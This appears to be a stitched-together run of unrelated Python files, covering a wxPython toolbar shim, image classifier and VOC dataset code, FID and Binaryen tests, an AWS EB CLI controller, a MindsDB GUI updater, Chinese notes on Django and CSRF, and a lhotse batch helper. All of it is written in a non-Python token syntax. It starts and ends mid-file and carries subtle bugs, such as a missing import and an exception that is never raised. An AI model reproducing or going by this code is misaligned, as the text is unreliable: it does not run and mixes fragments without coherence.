'''<def_stmt>__init__ self parent id=wx.ID_ANY pos=wx.DefaultPosition size=wx.DefaultSize style=wx.TB_HORIZONTAL name='toolbar'<block_start>wx.ToolBar.__init__(self parent id pos size style name)<block_end><def_stmt>AddTool self toolId label bitmap bmpDisabled=wx.NullBitmap kind=wx.ITEM_NORMAL shortHelp='' longHelp='' clientData=<none><block_start>''' Override to make this a very thin wrapper for AddLabelTool, which in wxPython 3 is the same as AddTool in wxPython 4 '''<line_sep><return>self.AddLabelTool(id=toolId label=label bitmap=bitmap bmpDisabled=bmpDisabled kind=kind shortHelp=shortHelp longHelp=longHelp clientData=clientData)<block_end><block_end><class_stmt>Wx4ToolBar(wx.ToolBar)<block_start>''' Special toolbar class that accepts wxPython 3-style AddLabelTool command and converts it to a wxPython 4-style AddTool command '''<def_stmt>__init__ self parent id=wx.ID_ANY pos=wx.DefaultPosition size=wx.DefaultSize style=wx.TB_HORIZONTAL name='toolbar'<block_start>wx.ToolBar.__init__(self parent id pos size style name)<block_end><def_stmt>AddLabelTool self id label bitmap bmpDisabled=wx.NullBitmap kind=wx.ITEM_NORMAL shortHelp='' longHelp='' clientData=<none><block_start>''' Override to make this a very thin wrapper for AddTool, which in wxPython 4 is the same as AddLabelTool in wxPython 3 '''<line_sep><return>self.AddTool(toolId=id label=label bitmap=bitmap bmpDisabled=bmpDisabled kind=kind shortHelp=shortHelp longHelp=longHelp clientData=clientData)<block_end><block_end># Use this ToolBar class to create toolbars in frames ToolBar=Wx4ToolBar<if>wx4<else>Wx3ToolBar<line_sep>
<import_stmt>torch.nn<as>nn<import_stmt>pretrainedmodels<class_stmt>classifier(nn.Module)<block_start><def_stmt>__init__ self model_name='resnet32'<block_start>super(classifier self).__init__()<line_sep># Load pretrained ImageNet model self.model=pretrainedmodels.__dict__[model_name](num_classes=1000 pretrained='imagenet')<line_sep>print(model_name+' model settings:')<for_stmt>var pretrainedmodels.pretrained_settings[model_name]['imagenet']<block_start>print('\t'+var+': '+str(pretrainedmodels.pretrained_settings[model_name]['imagenet'][var]))<block_end># Define last layer for fine-tuning dim_feats=self.model.last_linear.in_features<line_sep>nb_classes=1<line_sep>self.model.last_linear=F.dropout2d(nn.Linear(dim_feats nb_classes) p=0.50)<block_end><def_stmt>forward self input<block_start><return>self.model(input)<block_end><def_stmt>set_mode self mode<block_start>self.mode=mode<if_stmt>'validation'<in>mode<or>'test'<in>mode<block_start>self.eval()<block_end><elif_stmt>'train'<in>mode<block_start>self.train()<block_end><else_stmt><block_start><raise>NotImplementedError<block_end><block_end><block_end>
# -------------------------------------------------------- # Fast R-CNN # Copyright (c) 2015 Microsoft # Licensed under The MIT License [see LICENSE for details] # Written by <NAME> # Extended by <NAME> # -------------------------------------------------------- <import_stmt>os<import_stmt>cv2<import_stmt>numpy<as>np<import_stmt>torch<import_stmt>torch.utils.data<as>data<import_stmt>xml.etree.ElementTree<as>ET<import_from_stmt>utils.bbox quad_2_rbox<class_stmt>VOCDataset(data.Dataset)<block_start>""""""<def_stmt>__init__ self dataset='trainval.txt' augment=<false> level=1 random_flip=<true><block_start>self.image_set=dataset<line_sep>self.data_path=self.image_set.strip('/ImageSets/Main/trainval.txt')<line_sep>self.image_ext=[".jpg"]<line_sep>self.image_list=self._load_image_names()<line_sep>self.classes=('__background__' 'aeroplane' 'bicycle' 'bird' 'boat' 'bottle' 'bus' 'car' 'cat' 'chair' 'cow' 'diningtable' 'dog' 'horse' 'motorbike' 'person' 'pottedplant' 'sheep' 'sofa' 'train' 'tvmonitor')<line_sep>self.num_classes=len(self.classes)<line_sep>self.class_to_ind=dict(zip(self.classes range(self.num_classes)))<line_sep>self.random_flip=random_flip<block_end><def_stmt>__len__ self<block_start><return>len(self.image_list)<block_end><def_stmt>__getitem__ self index<block_start>im_path=self._image_path_from_index(self.image_list[index])<line_sep>im=cv2.cvtColor(cv2.imread(im_path cv2.IMREAD_COLOR) cv2.COLOR_BGR2RGB)<line_sep>roidb=self._load_pascal_annotation(self.image_list[index])<line_sep>gt_inds=np.where(roidb['gt_classes']<ne>0)[0]<line_sep>bboxes=roidb['boxes'][gt_inds :]<line_sep>classes=roidb['gt_classes'][gt_inds]<if_stmt>self.random_flip<and>np.random.rand()<ge>0.5<block_start>im=cv2.flip(im 1 <none>)<line_sep>oldxs=bboxes[: 0::2].copy()<line_sep>bboxes[: 0::2]=im.shape[1]-oldxs-1<block_end>gt_boxes=np.empty((len(gt_inds) 6) dtype=np.float32)<for_stmt>i,bbox enumerate(bboxes)<block_start>gt_boxes[i :5]=quad_2_rbox(np.array(bbox))<line_sep>gt_boxes[i 5]=classes[i]<block_end><return>{'image':im 'boxes':gt_boxes}<block_end><def_stmt>_load_image_names self<block_start>""" Load the names listed in this dataset's image set file. """<line_sep>image_set_file=self.image_set<if_stmt><not>os.path.exists(image_set_file)<block_start>'Path does not exist: {}'.format(image_set_file)<line_sep>image_names=[]<block_end><else_stmt><block_start><with_stmt>open(image_set_file)<as>f<block_start>image_names=[x.strip()<for>x f.readlines()]<block_end><block_end><return>image_names<block_end><def_stmt>_image_path_from_index self index<block_start>""" Construct an image path from the image's "index" identifier. """<line_sep>image_path=<none><line_sep>image_exist=<false><for_stmt>image_ext self.image_ext<block_start>image_path=os.path.join(self.data_path 'JPEGImages' index+image_ext)<if_stmt>os.path.exists(image_path)<block_start>image_exist=<true><line_sep><break><block_end><block_end><if_stmt><not>image_exist<block_start><raise>Exception('Image path does not exist: {}'.format(os.path.join(self.data_path 'JPEGImages' index)))<block_end><return>image_path<block_end><def_stmt>_load_pascal_annotation self index<block_start>""" Load image and bounding boxes info from XML file in the PASCAL VOC format. """<line_sep>filename=os.path.join(self.data_path 'Annotations' index+'.xml')<line_sep>tree=ET.parse(filename)<line_sep>objs=tree.findall('object')<line_sep>boxes,gt_classes=[] []<for_stmt>_,obj enumerate(objs)<block_start>difficult=int(obj.find('difficult').text)<line_sep>is_latin=obj.find('language')<is><none><or>obj.find('language').text<eq>'Latin'<line_sep>bnd_box=obj.find('bndbox')<line_sep>box=[float(bnd_box.find('xmin').text) float(bnd_box.find('ymin').text) float(bnd_box.find('xmax').text) float(bnd_box.find('ymin').text) float(bnd_box.find('xmax').text) float(bnd_box.find('ymax').text) float(bnd_box.find('xmin').text) float(bnd_box.find('ymax').text) ]<line_sep>label=self.class_to_ind[obj.find('name').text.lower().strip()]<if_stmt>difficult<block_start><continue><block_end># if self.only_latin and not is_latin: # continue boxes.append(box)<line_sep>gt_classes.append(label)<block_end><return>{'boxes':np.array(boxes dtype=np.int32) 'gt_classes':np.array(gt_classes)}<block_end><def_stmt>image_path_at self i<block_start>""" Return the absolute path to image i in the image sequence. """<line_sep><return>self._image_path_from_index(self.image_list[i])<block_end><def_stmt>return_class self id<block_start>id=int(id)<line_sep><return>self.classes[id]<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start><pass><block_end>
<import_stmt>numpy<as>np<import_stmt>pytest<import_stmt>torch<import_from_stmt>PIL Image<import_from_stmt>pytorch_fid fid_score inception<line_sep>@pytest.fixture<def_stmt>device <block_start><return>torch.device('cpu')<block_end><def_stmt>test_calculate_fid_given_statistics mocker tmp_path device<block_start>dim=2048<line_sep>m1,m2=np.zeros((dim )) np.ones((dim ))<line_sep>sigma=np.eye(dim)<def_stmt>dummy_statistics path model batch_size dims device num_workers<block_start><if_stmt>path.endswith('1')<block_start><return>m1 sigma<block_end><elif_stmt>path.endswith('2')<block_start><return>m2 sigma<block_end><else_stmt><block_start><raise>ValueError<block_end><block_end>mocker.patch('pytorch_fid.fid_score.compute_statistics_of_path' side_effect=dummy_statistics)<line_sep>dir_names=['1' '2']<line_sep>paths=[]<for_stmt>name dir_names<block_start>path=tmp_path/name<line_sep>path.mkdir()<line_sep>paths.append(str(path))<block_end>fid_value=fid_score.calculate_fid_given_paths(paths batch_size=dim device=device dims=dim num_workers=0)<line_sep># Given equal covariance, FID is just the squared norm of difference <assert_stmt>fid_value<eq>np.sum((m1-m2)<power>2)<block_end><def_stmt>test_compute_statistics_of_path mocker tmp_path device<block_start>model=mocker.MagicMock(inception.InceptionV3)()<line_sep>model.side_effect=<lambda>inp:[inp.mean(dim=(2 3) keepdim=<true>)]<line_sep>size=(4 4 3)<line_sep>arrays=[np.zeros(size) np.ones(size)<times>0.5 np.ones(size)]<line_sep>images=[(arr<times>255).astype(np.uint8)<for>arr arrays]<line_sep>paths=[]<for_stmt>idx,image enumerate(images)<block_start>paths.append(str(tmp_path/'{}.png'.format(idx)))<line_sep>Image.fromarray(image mode='RGB').save(paths[-1])<block_end>stats=fid_score.compute_statistics_of_path(str(tmp_path) model batch_size=len(images) dims=3 device=device num_workers=0)<assert_stmt>np.allclose(stats[0] np.ones((3 ))<times>0.5 atol=1e-3)<assert_stmt>np.allclose(stats[1] np.ones((3 3))<times>0.25)<block_end><def_stmt>test_compute_statistics_of_path_from_file mocker tmp_path device<block_start>model=mocker.MagicMock(inception.InceptionV3)()<line_sep>mu=np.random.randn(5)<line_sep>sigma=np.random.randn(5 5)<line_sep>path=tmp_path/'stats.npz'<with_stmt>path.open('wb')<as>f<block_start>np.savez(f mu=mu sigma=sigma)<block_end>stats=fid_score.compute_statistics_of_path(str(path) model batch_size=1 dims=5 device=device num_workers=0)<assert_stmt>np.allclose(stats[0] mu)<assert_stmt>np.allclose(stats[1] sigma)<block_end><def_stmt>test_image_types tmp_path<block_start>in_arr=np.ones((24 24 3) dtype=np.uint8)<times>255<line_sep>in_image=Image.fromarray(in_arr mode='RGB')<line_sep>paths=[]<for_stmt>ext fid_score.IMAGE_EXTENSIONS<block_start>paths.append(str(tmp_path/'img.{}'.format(ext)))<line_sep>in_image.save(paths[-1])<block_end>dataset=fid_score.ImagePathDataset(paths)<for_stmt>img dataset<block_start><assert_stmt>np.allclose(np.array(img) in_arr)<block_end><block_end>
<import_from_stmt>scripts.test shared<import_from_stmt>. utils<class_stmt>EmscriptenFinalizeTest(utils.BinaryenTestCase)<block_start><def_stmt>do_output_test self args# without any output file specified, don't error, don't write the wasm, # but do emit metadata <block_start>p=shared.run_process(shared.WASM_EMSCRIPTEN_FINALIZE+[self.input_path('empty_lld.wat') '--global-base=1024']+args capture_output=<true>)<line_sep># metadata is always present self.assertIn('{' p.stdout)<line_sep>self.assertIn('}' p.stdout)<line_sep><return>p.stdout<block_end><def_stmt>test_no_output self<block_start>stdout=self.do_output_test([])<line_sep># module is not present self.assertNotIn('(module' stdout)<block_end><def_stmt>test_text_output self<block_start>stdout=self.do_output_test(['-S'])<line_sep># module is present self.assertIn('(module' stdout)<block_end><block_end>
# Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. <import_stmt>textwrap<import_stmt>json<import_stmt>sys<import_stmt>os<import_from_stmt>cement.core controller<import_from_stmt>ebcli __version__<import_from_stmt>ebcli.core.ebglobals Constants<import_from_stmt>ebcli.lib elasticbeanstalk utils<import_from_stmt>ebcli.core io fileoperations<import_from_stmt>ebcli.objects.exceptions NoEnvironmentForBranchError PlatformWorkspaceNotSupportedError ApplicationWorkspaceNotSupportedError EBCLIException NotInitializedError <import_from_stmt>ebcli.resources.strings strings flag_text<import_from_stmt>ebcli.objects region<import_from_stmt>ebcli.operations commonops<class_stmt>AbstractBaseController(controller.CementBaseController)<block_start>""" This is an abstract base class that is useless on its own, but used by other classes to sub-class from and to share common commands and arguments. """<class_stmt>Meta<block_start>label='abstract'<line_sep>stacked_on='base'<line_sep>stacked_type='nested'<line_sep>arguments=[(['environment_name'] dict(action='store' nargs='?' default=[] help=flag_text['general.env'])) ]<line_sep>epilog=''<line_sep>usage='eb {cmd} <environment_name> [options ...]'<block_end><def_stmt>do_command self<block_start><pass><block_end>@classmethod<def_stmt>validate_workspace cls<block_start>workspace_type=fileoperations.get_workspace_type(<none>)<line_sep>is_platform_workspace_only_command=cls.Meta.__dict__.get('is_platform_workspace_only_command')<line_sep>requires_directory_initialization=cls.Meta.__dict__.get('requires_directory_initialization')<if_stmt>'--modules'<in>sys.argv<block_start><pass><block_end><elif_stmt>'--help'<in>sys.argv<block_start><pass><block_end><elif_stmt>cls.__name__<eq>'PlatformListController'<or>cls.__name__<eq>'EBPListController'<block_start><pass><block_end><elif_stmt>requires_directory_initialization<and><not>workspace_type<block_start><raise>NotInitializedError(strings['exit.notsetup'])<block_end><elif_stmt>is_platform_workspace_only_command<block_start><if_stmt>Constants.WorkSpaceTypes.APPLICATION<eq>workspace_type<block_start><raise>ApplicationWorkspaceNotSupportedError(strings['exit.applicationworkspacenotsupported'])<block_end><block_end><block_end>@controller.expose(hide=<true>)<def_stmt>default self<block_start>""" This command will be shared within all controllers that sub-class from here. It can also be overridden in the sub-class """<line_sep>self.validate_workspace()<line_sep>self.do_command()<line_sep>self.check_for_cli_update(__version__)<block_end><def_stmt>check_workspace_type self expected_type<block_start>workspace_type=fileoperations.get_workspace_type()<if_stmt>workspace_type<ne>expected_type<block_start><if_stmt>Constants.WorkSpaceTypes.PLATFORM<eq>workspace_type<block_start><raise>PlatformWorkspaceNotSupportedError(strings['exit.platformworkspacenotsupported'])<block_end><if_stmt>Constants.WorkSpaceTypes.APPLICATION<eq>workspace_type<block_start><raise>ApplicationWorkspaceNotSupportedError(strings['exit.applicationworkspacenotsupported'])<block_end><block_end><block_end><def_stmt>check_for_cli_update self version<block_start>label=self.Meta.label<if_stmt>label<in>('create' 'deploy' 'status' 'clone' 'config')<block_start><if_stmt>cli_update_exists(version)<block_start><if_stmt>self.check_install_script_used()<block_start>io.log_alert(strings['base.update_available_script_install'])<block_end><else_stmt><block_start>io.log_alert(strings['base.update_available'])<block_end><block_end><block_end><block_end><def_stmt>get_app_name self<block_start>app_name=fileoperations.get_application_name()<line_sep><return>app_name<block_end><def_stmt>get_env_name self cmd_example=<none> noerror=<false> varname='environment_name'<block_start>env_name=getattr(self.app.pargs varname <none>)<if_stmt><not>env_name<block_start>env_name=commonops.get_current_branch_environment()<block_end>workspace_type=fileoperations.get_workspace_type(Constants.WorkSpaceTypes.APPLICATION)<if_stmt><not>env_name<block_start><if_stmt>Constants.WorkSpaceTypes.PLATFORM<eq>workspace_type<block_start><raise>EBCLIException(strings['platform.nobuilderenv'])<block_end><if_stmt>noerror<block_start><return><none><block_end><if_stmt><not>cmd_example<block_start>message=strings['branch.noenv'].replace('{cmd}' self.Meta.label)<block_end><else_stmt><block_start>message=strings['branch.noenv'].replace('eb {cmd}' cmd_example)<block_end>io.log_error(message)<line_sep><raise>NoEnvironmentForBranchError()<block_end><return>env_name<block_end><def_stmt>check_install_script_used self<block_start><return>'.ebcli-virtual-env'<in>os.path.abspath(__file__)<block_end>@classmethod<def_stmt>_add_to_handler cls handler<block_start>handler.register(cls)<block_end>@property<def_stmt>_help_text self<block_start>""" Returns the help text displayed when for the commands of the type `eb <command> <subcommand>` except where <command> is "platform". """<line_sep>longest=0<def_stmt>pad label<block_start>padlength=longest-len(label)+2<line_sep>padding=' '<if_stmt>padlength<l>0<block_start><for_stmt>x range(0 longest)<block_start>padding<augadd>' '<block_end><block_end><else_stmt><block_start><for_stmt>x range(0 padlength)<block_start>padding<augadd>' '<block_end><block_end><return>padding<block_end>help_txt=''<for_stmt>label self._visible_commands<block_start><if_stmt>len(label)<g>longest<block_start>longest=len(label)<block_end><block_end><for_stmt>label self._visible_commands<block_start>cmd=self._dispatch_map[label]<line_sep>cmd_txt=' '<line_sep>cmd_name=label<line_sep>cmd_aliases=cmd['aliases']<if_stmt>len(cmd_aliases)<g>0<and>cmd['aliases_only']<block_start>cmd_name=cmd_aliases.pop(0)<block_end>cmd_txt<augadd>'{}'.format(cmd_name)<if_stmt>cmd['help']<block_start>cmd_txt<augadd>'{}{}'.format(pad(cmd_txt) cmd['help'])<block_end><if_stmt>len(cmd_aliases)<g>0<block_start>cmd_txt<augadd>'\n{}(alias: {})'.format(pad('') ', '.join(cmd_aliases))<block_end>cmd_txt<augadd>'\n'<line_sep>help_txt<augadd>cmd_txt<block_end><if_stmt>len(help_txt)<g>0<block_start>txt='''{} commands: {} '''.format(self._meta.description help_txt)<block_end><else_stmt><block_start>txt=self._meta.description<block_end><return>textwrap.dedent(txt)<block_end><block_end><def_stmt>cli_update_exists current_version<block_start><try_stmt><block_start>data=utils.get_data_from_url('https://pypi.python.org/pypi/awsebcli/json' timeout=5)<line_sep>data=json.loads(data)<line_sep>latest=data['info']['version']<line_sep><return>latest<ne>current_version<block_end><except_stmt><block_start><return><false><block_end><block_end>
<import_from_stmt>distutils.version LooseVersion<import_stmt>requests<import_stmt>os<import_stmt>shutil<import_stmt>threading<import_stmt>webbrowser<import_from_stmt>zipfile ZipFile<import_from_stmt>pathlib Path<import_stmt>traceback<import_stmt>tempfile<line_sep># import concurrent.futures <import_from_stmt>flask Flask url_for make_response<import_from_stmt>flask.json dumps<import_from_stmt>flask_restx Api<import_from_stmt>mindsdb.__about__ __version__<as>mindsdb_version<import_from_stmt>mindsdb.interfaces.datastore.datastore DataStore<import_from_stmt>mindsdb.interfaces.model.model_interface ModelInterface<import_from_stmt>mindsdb.interfaces.database.integrations IntegrationController<import_from_stmt>mindsdb.utilities.ps is_pid_listen_port wait_func_is_true<import_from_stmt>mindsdb.utilities.telemetry inject_telemetry_to_static<import_from_stmt>mindsdb.utilities.config Config<import_from_stmt>mindsdb.utilities.log get_log<import_from_stmt>mindsdb.interfaces.storage.db session<import_from_stmt>mindsdb.utilities.json_encoder CustomJSONEncoder<class_stmt>Swagger_Api(Api)<block_start>""" This is a modification of the base Flask Restplus Api class due to the issue described here https://github.com/noirbizarre/flask-restplus/issues/223 """<line_sep>@property<def_stmt>specs_url self<block_start><return>url_for(self.endpoint("specs") _external=<false>)<block_end><block_end><def_stmt>custom_output_json data code headers=<none><block_start>resp=make_response(dumps(data) code)<line_sep>resp.headers.extend(headers<or>{})<line_sep><return>resp<block_end><def_stmt>get_last_compatible_gui_version <arrow>LooseVersion<block_start>log=get_log('http')<try_stmt><block_start>res=requests.get('https://mindsdb-web-builds.s3.amazonaws.com/compatible-config.json' timeout=5)<block_end><except_stmt>(ConnectionError requests.exceptions.ConnectionError)<as>e<block_start>print(f'Is no connection. {e}')<line_sep><return><false><block_end><except_stmt>Exception<as>e<block_start>print(f'Is something wrong with getting compatible-config.json: {e}')<line_sep><return><false><block_end><if_stmt>res.status_code<ne>200<block_start>print(f'Cant get compatible-config.json: returned status code = {res.status_code}')<line_sep><return><false><block_end><try_stmt><block_start>versions=res.json()<block_end><except_stmt>Exception<as>e<block_start>print(f'Cant decode compatible-config.json: {e}')<line_sep><return><false><block_end>current_mindsdb_lv=LooseVersion(mindsdb_version)<try_stmt><block_start>gui_versions={}<line_sep>max_mindsdb_lv=<none><line_sep>max_gui_lv=<none><for_stmt>el versions['mindsdb']<block_start><if_stmt>el['mindsdb_version']<is><none><block_start>gui_lv=LooseVersion(el['gui_version'])<block_end><else_stmt><block_start>mindsdb_lv=LooseVersion(el['mindsdb_version'])<line_sep>gui_lv=LooseVersion(el['gui_version'])<if_stmt>mindsdb_lv.vstring<not><in>gui_versions<or>gui_lv<g>gui_versions[mindsdb_lv.vstring]<block_start>gui_versions[mindsdb_lv.vstring]=gui_lv<block_end><if_stmt>max_mindsdb_lv<is><none><or>max_mindsdb_lv<l>mindsdb_lv<block_start>max_mindsdb_lv=mindsdb_lv<block_end><block_end><if_stmt>max_gui_lv<is><none><or>max_gui_lv<l>gui_lv<block_start>max_gui_lv=gui_lv<block_end><block_end>all_mindsdb_lv=[LooseVersion(x)<for>x gui_versions.keys()]<line_sep>all_mindsdb_lv.sort()<if_stmt>current_mindsdb_lv.vstring<in>gui_versions<block_start>gui_version_lv=gui_versions[current_mindsdb_lv.vstring]<block_end><elif_stmt>current_mindsdb_lv<g>all_mindsdb_lv[-1]<block_start>gui_version_lv=max_gui_lv<block_end><else_stmt><block_start>lower_versions={key:value<for>key,value gui_versions.items()<if>LooseVersion(key)<l>current_mindsdb_lv}<if_stmt>len(lower_versions)<eq>0<block_start>gui_version_lv=gui_versions[all_mindsdb_lv[0].vstring]<block_end><else_stmt><block_start>all_lower_versions=[LooseVersion(x)<for>x lower_versions.keys()]<line_sep>gui_version_lv=gui_versions[all_lower_versions[-1].vstring]<block_end><block_end><block_end><except_stmt>Exception<as>e<block_start>log.error(f'Error in compatible-config.json structure: {e}')<line_sep><return><false><block_end><return>gui_version_lv<block_end><def_stmt>get_current_gui_version <arrow>LooseVersion<block_start>config=Config()<line_sep>static_path=Path(config['paths']['static'])<line_sep>version_txt_path=static_path.joinpath('version.txt')<line_sep>current_gui_version=<none><if_stmt>version_txt_path.is_file()<block_start><with_stmt>open(version_txt_path 'rt')<as>f<block_start>current_gui_version=f.readline()<block_end><block_end>current_gui_lv=<none><if>current_gui_version<is><none><else>LooseVersion(current_gui_version)<line_sep><return>current_gui_lv<block_end><def_stmt>download_gui destignation version<block_start><if_stmt>isinstance(destignation str)<block_start>destignation=Path(destignation)<block_end>log=get_log('http')<line_sep>dist_zip_path=str(destignation.joinpath('dist.zip'))<line_sep>bucket="https://mindsdb-web-builds.s3.amazonaws.com/"<line_sep>resources=[{'url':bucket+'dist-V'+version+'.zip' 'path':dist_zip_path}]<def_stmt>get_resources resource<block_start>response=requests.get(resource['url'])<if_stmt>response.status_code<ne>requests.status_codes.codes.ok<block_start><raise>Exception(f"Error {response.status_code} GET {resource['url']}")<block_end>open(resource['path'] 'wb').write(response.content)<block_end><try_stmt><block_start><for_stmt>r resources<block_start>get_resources(r)<block_end><block_end><except_stmt>Exception<as>e<block_start>log.error(f'Error during downloading files from s3: {e}')<line_sep><return><false><block_end>static_folder=destignation<line_sep>static_folder.mkdir(mode=0o777 exist_ok=<true> parents=<true>)<line_sep>ZipFile(dist_zip_path).extractall(static_folder)<if_stmt>static_folder.joinpath('dist').is_dir()<block_start>shutil.move(str(destignation.joinpath('dist').joinpath('index.html')) static_folder)<line_sep>shutil.move(str(destignation.joinpath('dist').joinpath('assets')) static_folder)<line_sep>shutil.rmtree(destignation.joinpath('dist'))<block_end>os.remove(dist_zip_path)<line_sep>version_txt_path=destignation.joinpath('version.txt')# os.path.join(destignation, 'version.txt') <with_stmt>open(version_txt_path 'wt')<as>f<block_start>f.write(version)<block_end><return><true><line_sep>''' # to make downloading faster download each resource in a separate thread with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor: future_to_url = {executor.submit(get_resources, r): r for r in resources} for future in concurrent.futures.as_completed(future_to_url): res = future.result() if res is not None: raise res '''<block_end><def_stmt>initialize_static <block_start>success=update_static()<line_sep>session.close()<line_sep><return>success<block_end><def_stmt>update_static <block_start>''' Update Scout files basing on compatible-config.json content. Files will be downloaded and updated if new version of GUI > current. Current GUI version stored in static/version.txt. '''<line_sep>config=Config()<line_sep>log=get_log('http')<line_sep>static_path=Path(config['paths']['static'])<line_sep>last_gui_version_lv=get_last_compatible_gui_version()<line_sep>current_gui_version_lv=get_current_gui_version()<if_stmt>last_gui_version_lv<is><false><block_start><return><false><block_end><if_stmt>current_gui_version_lv<is><not><none><block_start><if_stmt>current_gui_version_lv<ge>last_gui_version_lv<block_start><return><true><block_end><block_end>log.info(f'New version of GUI available ({last_gui_version_lv.vstring}). Downloading...')<line_sep>temp_dir=tempfile.mkdtemp(prefix='mindsdb_gui_files_')<line_sep>success=download_gui(temp_dir last_gui_version_lv.vstring)<if_stmt>success<is><false><block_start>shutil.rmtree(temp_dir)<line_sep><return><false><block_end>temp_dir_for_rm=tempfile.mkdtemp(prefix='mindsdb_gui_files_')<line_sep>shutil.rmtree(temp_dir_for_rm)<line_sep>shutil.copytree(str(static_path) temp_dir_for_rm)<line_sep>shutil.rmtree(str(static_path))<line_sep>shutil.copytree(temp_dir str(static_path))<line_sep>shutil.rmtree(temp_dir_for_rm)<line_sep>log.info(f'GUI version updated to {last_gui_version_lv.vstring}')<line_sep><return><true><block_end><def_stmt>initialize_flask config init_static_thread no_studio# Apparently there's a bug that causes the static path not to work if it's '/' -- https://github.com/pallets/flask/issues/3134, I think '' should achieve the same thing (???) <block_start><if_stmt>no_studio<block_start>app=Flask(__name__)<block_end><else_stmt><block_start>static_path=os.path.join(config['paths']['static'] 'static/')<if_stmt>os.path.isabs(static_path)<is><false><block_start>static_path=os.path.join(os.getcwd() static_path)<block_end>app=Flask(__name__ static_url_path='/static' static_folder=static_path)<block_end>app.config['SEND_FILE_MAX_AGE_DEFAULT']=60<line_sep>app.config['SWAGGER_HOST']='http://localhost:8000/mindsdb'<line_sep>app.json_encoder=CustomJSONEncoder<line_sep>authorizations={'apikey':{'type':'session' 'in':'query' 'name':'session'}}<line_sep>api=Swagger_Api(app authorizations=authorizations security=['apikey'] url_prefix=':8000' prefix='/api' doc='/doc/')<line_sep>api.representations['application/json']=custom_output_json<line_sep>port=config['api']['http']['port']<line_sep>host=config['api']['http']['host']<line_sep># NOTE rewrite it, that hotfix to see GUI link <if_stmt><not>no_studio<block_start>log=get_log('http')<if_stmt>host<in>('' '0.0.0.0')<block_start>url=f'http://127.0.0.1:{port}/'<block_end><else_stmt><block_start>url=f'http://{host}:{port}/'<block_end>log.info(f' - GUI available at {url}')<line_sep>pid=os.getpid()<line_sep>x=threading.Thread(target=_open_webbrowser args=(url pid port init_static_thread config['paths']['static']) daemon=<true>)<line_sep>x.start()<block_end><return>app api<block_end><def_stmt>initialize_interfaces app<block_start>app.original_data_store=DataStore()<line_sep>app.original_model_interface=ModelInterface()<line_sep>app.original_integration_controller=IntegrationController()<line_sep>config=Config()<line_sep>app.config_obj=config<block_end><def_stmt>_open_webbrowser url:str pid:int port:int init_static_thread static_folder<block_start>"""Open webbrowser with url when http service is started. If some error then do nothing. """<line_sep>init_static_thread.join()<line_sep>inject_telemetry_to_static(static_folder)<line_sep>logger=get_log('http')<try_stmt><block_start>is_http_active=wait_func_is_true(func=is_pid_listen_port timeout=10 pid=pid port=port)<if_stmt>is_http_active<block_start>webbrowser.open(url)<block_end><block_end><except_stmt>Exception<as>e<block_start>logger.error(f'Failed to open {url} in webbrowser with exception {e}')<line_sep>logger.error(traceback.format_exc())<block_end>session.close()<block_end>
""" 模板语言: {{ 变量 }} {% 代码段 %} {% 一个参数时:变量|过滤器, Book.id | add: 1 <= 2 当前id+1来和2比较 两个参数时:变量|过滤器:参数 %}, 过滤器最多只能传2个参数,过滤器用来对传入的变量进行修改 {% if book.name|length > 4 %} 管道|符号的左右不能有多余的空格,否则报错,其次并不是name.length而是通过管道来过滤 {{ book.pub_date|date:'Y年m月j日' }} 日期的转换管道 """<line_sep>""" CSRF 跨站请求伪造, 盗用别人的信息,以你的名义进行恶意请求 比如:服务器返回一个表单进行转账操作,再把转账信息返回给服务器。 需要判断发送转账信息请求的客户端是不是刚才获取表单界面的客户端,防止回送请求的修改,和返回页面的修改(表单地址被修改为黑客地址,信息丢失) 防止CSRF需要服务器做安全验证 """<line_sep>""" 验证码主要用来防止暴力请求,原理就是请求页面之前生成一个动态不同的验证码写入到session中 用户登录的时候,会拿着填写的验证码和session中的验证码比较进行验证 """<line_sep>
<import_stmt>warnings<import_from_stmt>typing Dict Tuple<import_from_stmt>lhotse CutSet<import_from_stmt>lhotse.dataset.sampling.base CutSampler<def_stmt>find_pessimistic_batches sampler:CutSampler batch_tuple_index:int=0<arrow>Tuple[Dict[str CutSet] Dict[str float]]<block_start>""" Function for finding 'pessimistic' batches, i.e. batches that have the highest potential to blow up the GPU memory during training. We will fully iterate the sampler and record the most risky batches under several criteria: - single longest cut - single longest supervision - largest batch cuts duration - largest batch supervisions duration - max num cuts - max num supervisions .. note: It is up to the users to convert the sampled CutSets into actual batches and test them by running forward and backward passes with their model. Example of how this function can be used with a PyTorch model and a :class:`~lhotse.dataset.K2SpeechRecognitionDataset`:: sampler = SingleCutSampler(cuts, max_duration=300) dataset = K2SpeechRecognitionDataset() batches, scores = find_pessimistic_batches(sampler) for reason, cuts in batches.items(): try: batch = dset[cuts] outputs = model(batch) loss = loss_fn(outputs) loss.backward() except: print(f"Exception caught when evaluating pessimistic batch for: {reason}={scores[reason]}") raise :param sampler: An instance of a Lhotse :class:`.CutSampler`. :param batch_tuple_index: Applicable to samplers that return tuples of :class:`~lhotse.cut.CutSet`. Indicates which position in the tuple we should look up for the CutSet. :return: A tuple of dicts: the first with batches (as CutSets) and the other with criteria values, i.e.: ``({"<criterion>": <CutSet>, ...}, {"<criterion>": <value>, ...})`` """<line_sep>criteria={"single_longest_cut":<lambda>cuts:max(c.duration<for>c cuts) "single_longest_supervision":<lambda>cuts:max(sum(s.duration<for>s c.supervisions)<for>c cuts) "largest_batch_cuts_duration":<lambda>cuts:sum(c.duration<for>c cuts) "largest_batch_supervisions_duration":<lambda>cuts:sum(s.duration<for>c cuts<for>s c.supervisions) "max_num_cuts":len "max_num_supervisions":<lambda>cuts:sum(1<for>c cuts<for>_ c.supervisions) }<try_stmt><block_start>sampler=iter(sampler)<line_sep>first_batch=next(sampler)<if_stmt>isinstance(first_batch tuple)<block_start>first_batch=first_batch[batch_tuple_index]<block_end><block_end><except_stmt>StopIteration<block_start>warnings.warn("Empty sampler encountered in find_pessimistic_batches()")<line_sep><return>{} {}<block_end>top_batches={k:first_batch<for>k criteria}<line_sep>top_values={k:fn(first_batch)<for>k,fn criteria.items()}<for_stmt>batch sampler<block_start><if_stmt>isinstance(batch tuple)<block_start>batch=batch[batch_tuple_index]<block_end><for_stmt>crit,fn 